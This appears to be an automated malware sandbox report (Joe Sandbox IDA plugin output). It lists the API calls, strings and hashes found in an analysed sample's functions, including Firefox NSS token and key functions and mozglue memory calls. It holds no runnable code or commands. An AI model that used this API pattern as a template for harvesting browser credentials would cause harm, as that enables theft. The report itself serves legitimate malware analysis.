                                                                                                                                                                                          • Instruction Fuzzy Hash: FC11A371300262EF9B249E2CFC8197AB3B9FF853947540239F9058B642C761ED61C7A1
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C583440: PK11_GetAllTokens.NSS3 ref: 6C583481
                                                                                                                                                                                            • Part of subcall function 6C583440: PR_SetError.NSS3(00000000,00000000), ref: 6C5834A3
                                                                                                                                                                                            • Part of subcall function 6C583440: TlsGetValue.KERNEL32 ref: 6C58352E
                                                                                                                                                                                            • Part of subcall function 6C583440: EnterCriticalSection.KERNEL32(?), ref: 6C583542
                                                                                                                                                                                            • Part of subcall function 6C583440: PR_Unlock.NSS3(?), ref: 6C58355B
                                                                                                                                                                                          • PK11_GenerateKeyPairWithOpFlags.NSS3(00000000,00001040,?,?,0000008A,.exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon.,00080800,?,?,?,?,?,?,?,?), ref: 6C542CC1
                                                                                                                                                                                            • Part of subcall function 6C556D90: memcpy.VCRUNTIME140(?,6C65A8EC,0000006C), ref: 6C556DC6
                                                                                                                                                                                            • Part of subcall function 6C556D90: memcpy.VCRUNTIME140(?,6C65A958,0000006C), ref: 6C556DDB
                                                                                                                                                                                            • Part of subcall function 6C556D90: memcpy.VCRUNTIME140(?,6C65A9C4,00000078), ref: 6C556DF1
                                                                                                                                                                                            • Part of subcall function 6C556D90: memcpy.VCRUNTIME140(?,6C65AA3C,0000006C), ref: 6C556E06
                                                                                                                                                                                            • Part of subcall function 6C556D90: memcpy.VCRUNTIME140(?,6C65AAA8,00000060), ref: 6C556E1C
                                                                                                                                                                                            • Part of subcall function 6C556D90: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C556E38
                                                                                                                                                                                          • PK11_GenerateKeyPairWithOpFlags.NSS3(00000000,00001040,?,?,00000046,.exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon.,00080800,?), ref: 6C542CE8
                                                                                                                                                                                            • Part of subcall function 6C556D90: PK11_DoesMechanism.NSS3(?,?), ref: 6C556E76
                                                                                                                                                                                            • Part of subcall function 6C556D90: TlsGetValue.KERNEL32 ref: 6C55726F
                                                                                                                                                                                            • Part of subcall function 6C556D90: EnterCriticalSection.KERNEL32(?), ref: 6C557283
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • .exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon., xrefs: 6C542CAB, 6C542CD5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$K11_$CriticalEnterErrorFlagsGeneratePairSectionValueWith$DoesMechanismTokensUnlock
                                                                                                                                                                                          • String ID: .exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon.
                                                                                                                                                                                          • API String ID: 2473486326-888798798
                                                                                                                                                                                          • Opcode ID: 9ebbe89e74d7ccd73423fb4b4c50a28bd7dec649ef956d13c2a3cd4107d4c778
                                                                                                                                                                                          • Instruction ID: df3ecc627cdac98812903c79adef0cadc60d02fed620fe42303ca835905f2374
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ebbe89e74d7ccd73423fb4b4c50a28bd7dec649ef956d13c2a3cd4107d4c778
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A1108B1600218BBEB115A529C86FDB366DAB8574CF504021FF54AE280EE72ED5887F6
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                          • String ID: image/jpeg
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 0002F13E
                                                                                                                                                                                            • Part of subcall function 0004EC45: std::exception::exception.LIBCMT ref: 0004EC5A
                                                                                                                                                                                            • Part of subcall function 0004EC45: __CxxThrowException@8.LIBCMT ref: 0004EC6F
                                                                                                                                                                                            • Part of subcall function 0004EC45: std::exception::exception.LIBCMT ref: 0004EC80
                                                                                                                                                                                            • Part of subcall function 0002F238: std::_Xinvalid_argument.LIBCPMT ref: 0002F242
                                                                                                                                                                                          • _memmove.LIBCMT ref: 0002F190
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • invalid string position, xrefs: 0002F139
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                                                                                                                          • String ID: invalid string position
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C453D19
                                                                                                                                                                                          • mozalloc_abort.MOZGLUE(?), ref: 6C453D6C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _errnomozalloc_abort
                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 0002F35C
                                                                                                                                                                                            • Part of subcall function 0004EC45: std::exception::exception.LIBCMT ref: 0004EC5A
                                                                                                                                                                                            • Part of subcall function 0004EC45: __CxxThrowException@8.LIBCMT ref: 0004EC6F
                                                                                                                                                                                            • Part of subcall function 0004EC45: std::exception::exception.LIBCMT ref: 0004EC80
                                                                                                                                                                                          • memmove.MSVCRT(0002EEBE,0002EEBE,C6C68B00,0002EEBE,0002EEBE,0002F15F,?,?,?,0002F1DF,?,?,?,75920440,?,-00000001), ref: 0002F392
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • invalid string position, xrefs: 0002F357
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                                                                                                                          • String ID: invalid string position
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3('8Zl,00000000,00000000,?,?,6C5A3827,?,00000000), ref: 6C5A4D0A
                                                                                                                                                                                            • Part of subcall function 6C590840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5908B4
                                                                                                                                                                                          • SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C5A4D22
                                                                                                                                                                                            • Part of subcall function 6C58FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C531A3E,00000048,00000054), ref: 6C58FD56
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$Equal_ErrorFindItemsTag_memcmp
                                                                                                                                                                                          • String ID: '8Zl
                                                                                                                                                                                          • API String ID: 1521942269-847864862
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: NameName::
                                                                                                                                                                                          • String ID: {flat}
                                                                                                                                                                                          • API String ID: 1333004437-2606204563
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(0KEl,?,6C454B30,80000000,?,6C454AB7,?,6C4143CF,?,6C4142D2), ref: 6C426C42
                                                                                                                                                                                            • Part of subcall function 6C42CA10: malloc.MOZGLUE(?), ref: 6C42CA26
                                                                                                                                                                                          • moz_xmalloc.MOZGLUE(0KEl,?,6C454B30,80000000,?,6C454AB7,?,6C4143CF,?,6C4142D2), ref: 6C426C58
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: moz_xmalloc$malloc
                                                                                                                                                                                          • String ID: 0KEl
                                                                                                                                                                                          • API String ID: 1967447596-1688916911
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: GlobalMemoryStatus_memset
                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                          • API String ID: 587104284-2766056989
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Value$calloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3339632435-0